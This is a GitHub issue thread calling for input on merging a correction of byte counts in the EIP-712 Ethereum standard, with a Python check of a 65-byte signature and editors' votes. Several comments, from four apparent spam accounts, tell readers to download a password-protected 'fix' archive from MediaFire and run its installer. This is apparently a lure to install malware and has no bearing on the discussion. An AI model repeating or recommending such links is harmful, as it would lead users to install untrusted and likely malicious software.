### ISSUE TITLE
Call for Input: Fix incorrect byte counts in EIP-712

### ISSUE THREAD

**Issue by SamWilsn** [ethcatherders/EIPIP#357]
## Call for Input

<table>
<tr>
<th>Decision</th>
<td>

Do we merge https://github.com/ethereum/EIPs/pull/8722 ?

</td>
</tr>
<tr>
<th>If Affirmed</th>
<td>

The pull request https://github.com/ethereum/EIPs/pull/8722 is merged

</td>
</tr>
<tr>
<th>If Rejected</th>
<td>

No changes made to EIP-712

</td>
</tr>
<tr>
<th>Method</th>
<td>

Rough Consensus

</td>
</tr>
<tr>
<th>Deadline</th>
<td>

September 25th, 2024

</td>
</tr>
</table>

### Background

See https://github.com/ethereum/EIPs/pull/8722

### Checklist

I, the opener of this Call for Input, have completed the following:

- [x] Filled in a descriptive title.
- [x] Filled in the "Decision" field.
- [x] Filled in the "If Affirmed" field.
- [x] Filled in the "If Rejected" field.
- [x] Filled in the "Method" field.
- [x] Filled in the "Deadline" field to be thirty days from creation.
- [x] Added any relevant background information (or removed the section.)
- [x] Published a notice in writing to the usual channels frequented by EIP Editors (likely Discord.)
- [x] Commented on this Call for Input, clearly stating my opinion (or abstention.)

**Comment by SamWilsn** [comment]
**In Favour**

---

Grabbing a random signature from etherscan: https://etherscan.io/verifySig/257008

Checking this with Python gives:

```python
>>> len(bytes.fromhex('466a43011085d6c9f480c044e6987462e6636e82065721525c4bbb4f8cf33cb339b4145bd90b172dc6878c690cb350256c69cbe2e88873b6b723856789d508901c'))
65
```

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by abcoathup** [comment]
I'm against (but don't have a vote).  

-----

Reviewing such a change should not be on editors, it should be on the authors.  If the authors approve a fix then editors could merge.  I couldn't see anything from the original authors.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by g11tech** [comment]
in favor

even though I agree with @abcoathup , this is a fairly straightforward correction that any EL dev can verify. So i am in favor of the correction.

**Comment by lightclient** [comment]
in favor
